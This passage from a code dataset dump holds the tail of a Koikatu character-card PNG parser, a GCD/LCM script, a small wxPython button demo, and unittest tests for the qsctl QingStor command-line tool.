data):\n len_ = self._read_byte(data)\n value = data.read(len_)\n return (value.decode('utf8'), len_)\n\n\n def _pack_utf8_string(self, string):\n len_ = self._pack_byte(string[1])\n binary = string[0].encode()\n return len_ + binary\n\n\n def _read_byte(self, data):\n return struct.unpack('b', data.read(1))[0]\n\n\n def _pack_byte(self, size):\n return struct.pack('b', size)\n\n\n def _read_int(self, data, endian='<'):\n return struct.unpack(endian + 'i', data.read(4))[0]\n\n\n def _pack_int(self, size, endian='<'):\n return struct.pack(endian + 'i', size)\n\n\n def _read_png(self, data):\n signature = data.read(8) # PNG file signature\n assert signature == 
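The `_read_int`/`_pack_int` helpers above take an endian prefix because the character blob is little-endian throughout, while the PNG chunk lengths read in `_read_png` just below use network byte order (`'!'`). The difference on the wire:

```python
import struct

n = 0x0000_0102
assert struct.pack("<i", n) == b"\x02\x01\x00\x00"   # little-endian, the record's default
assert struct.pack("!i", n) == b"\x00\x00\x01\x02"   # big-endian, used for PNG chunk lengths
assert struct.unpack("!i", b"\x00\x00\x01\x02")[0] == n
```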
b'\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a'\n\n ihdr = data.read(25)\n\n # read IDAT chunk\n idat_chunks = []\n len_ = self._read_int(data, '!')\n while len_ > 0:\n idat_type = data.read(4)\n assert idat_type == b'IDAT'\n\n idat_data = data.read(len_)\n idat_crc = data.read(4)\n idat_chunks.append((len_, idat_type, idat_data, idat_crc))\n\n len_ = self._read_int(data, '!')\n\n # read IEND chunk\n iend_len = len_\n iend = data.read(4)\n assert iend == b'IEND'\n\n iend_crc = data.read(4)\n\n data = [signature, ihdr]\n for idat_chunk in idat_chunks:\n data += [\n self._pack_int(idat_chunk[0], '!'),\n idat_chunk[1], idat_chunk[2], idat_chunk[3]\n ]\n data += [self._pack_int(iend_len, '!'), iend, iend_crc]\n\n return b\"\".join(data)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('png_file')\n\n args = parser.parse_args()\n\n with open(args.png_file, 'rb') as infile:\n chara = KoikatuCharacter(infile, True)\n\n pprint.pprint(chara.parameter)\n #pprint.pprint(chara.status)\n #pprint.pprint(chara.additional)\n\n","sub_path":"character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":16307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"435200284","text":"# LCM: Least Common Multiple\n# GCD: Greatest Common Divisor\n\nimport sys\n\ndef gcd(a, b):\n while b != 0:\n a, b = b, a % b\n return a\n\ndef lcd(a, b):\n if a > b:\n a, b = b, a\n ans = a\n while ans % b != 0:\n ans += a\n return ans\n\na, b = map(int, sys.stdin.readline().split())\nprint(gcd(a, b))\nprint(lcd(a, b))","sub_path":"scripts/02609.py","file_name":"02609.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"327167333","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport wx\n\nclass MyFrame(wx.Frame):\n top = 10\n def __init__(self, superior):\n wx.Frame.__init__(self, parent=superior, title=\"Hi\", pos=(100, 200), size=(300,500))\n self.Bind(wx.EVT_LEFT_UP, self.onClick)\n\n def onBtnClick(self, e):\n e.GetEventObject().Hide()\n\n def onClick(self, e):\n b = wx.Button(f, pos=(30,MyFrame.top), label='what', size=(120,20))\n MyFrame.top += b.GetBestSize().GetHeight()\n b.Bind(wx.EVT_LEFT_UP, self.onBtnClick)\n\n\nif __name__ == '__main__' :\n app = wx.App()\n f = MyFrame(None)\n f.Show(True)\n app.MainLoop()\n","sub_path":"wxGUI.py","file_name":"wxGUI.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"463338020","text":"import os\nimport unittest\n\nfrom mock_options import MockOptions\n\nfrom tests.test_data import zone, test_bucket1, test_bucket2\n\nfrom qingstor.qsctl.commands.base import BaseCommand\nfrom qingstor.qsctl.utils import load_conf\n\n\nclass TestBaseCommand(unittest.TestCase):\n Base = BaseCommand\n\n def setUp(self):\n # Set the http connection\n conf = load_conf(\"~/.qingstor/config.yaml\")\n options = MockOptions()\n self.Base.command = \"base\"\n self.Base.client = self.Base.get_client(conf)\n\n self.test_bucket = self.Base.client.Bucket(test_bucket1, zone)\n self.test_bucket.put()\n resp = self.test_bucket.head()\n if resp.status_code != 200:\n self.fail(\"setUp failed: please use another bucket name\")\n self.test_bucket.put_object(\"existskey\")\n\n self.local_path = \"./tmp/tmp.file\"\n\n def test_validate_bucket(self):\n self.Base.validate_bucket(test_bucket1)\n with 
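The gcd/lcm record above computes the LCM by stepping through multiples of `a`, which takes on the order of `b / gcd(a, b)` iterations; with Euclid's gcd already in hand, the closed form `a * b // gcd(a, b)` is constant-time. A check of the identity:

```python
def gcd(a, b):
    while b:
        a, b = b, a % b
    return a

def lcm(a, b):
    return a * b // gcd(a, b)

assert gcd(24, 18) == 6
assert lcm(24, 18) == 72
```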
self.assertRaises(SystemExit):\n self.Base.validate_bucket(test_bucket2)\n\n def test_validate_local_path(self):\n self.Base.validate_local_path(self.local_path)\n dirname = os.path.dirname(self.local_path)\n self.assertTrue(os.path.exists(dirname))\n\n def test_validate_qs_path(self):\n bucket, prefix = self.Base.validate_qs_path(\"qs://\" + test_bucket1 +\n \"/prefix\")\n self.assertEqual(bucket, test_bucket1)\n self.assertEqual(prefix, \"prefix\")\n\n def test_key_exists(self):\n self.assertTrue(self.Base.key_exists(test_bucket1, \"existskey\"))\n self.assertFalse(self.Base.key_exists(test_bucket1, \"noneexistskey\"))\n\n def test_remove_key(self):\n self.Base.remove_key(test_bucket1, \"existskey\")\n\n def test_confirm_key_remove(self):\n options = MockOptions(exclude=\"*\", include=\"*.jpg\")\n self.assertTrue(self.Base.confirm_key_remove(\"test.jpg\", options))\n self.assertFalse(self.Base.confirm_key_remove(\"test.txt\", options))\n\n def test_list_multiple_keys_1(self):\n for i in range(0, 9):\n key = \"prefix\" + \"/\" + str(i)\n self.test_bucket.put_object(key)\n keys, next_marker, dirs = self.Base.list_multiple_keys(\n test_bucket1, prefix=\"prefix\", delimiter=\"/\")\n self.assertEqual(len(keys), 0)\n self.assertEqual(next_marker, \"\")\n self.assertEqual(dirs, ['prefix/'])\n\n def test_list_multiple_keys_2(self):\n marker = \"prefix/5\"\n keys, next_marker, dirs = self.Base.list_multiple_keys(\n test_bucket1, marker=marker, prefix=\"prefix\", limit=1)\n self.assertEqual(len(keys), 1)\n self.assertEqual(next_marker, \"prefix/6\")\n self.assertEqual(dirs, [])\n\n def test_remove_multiple_keys(self):\n options = MockOptions(exclude=None, include=None)\n self.Base.remove_multiple_keys(\n test_bucket1, prefix=\"prefix\", options=options)\n\n def tearDown(self):\n self.test_bucket.delete_object(\"existskey\")\n dirname = os.path.dirname(self.local_path)\n if os.path.exists(dirname):\n os.rmdir(dirname)\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","sub_path":"tests/commands/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
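The qsctl test above drives commands with a `MockOptions` stand-in for parsed CLI arguments (a helper of that test suite, not shown here). When a full mock class is overkill, `types.SimpleNamespace` gives the same attribute-style access; a sketch:

```python
from types import SimpleNamespace

options = SimpleNamespace(exclude="*", include="*.jpg")
assert options.exclude == "*"
assert options.include == "*.jpg"
```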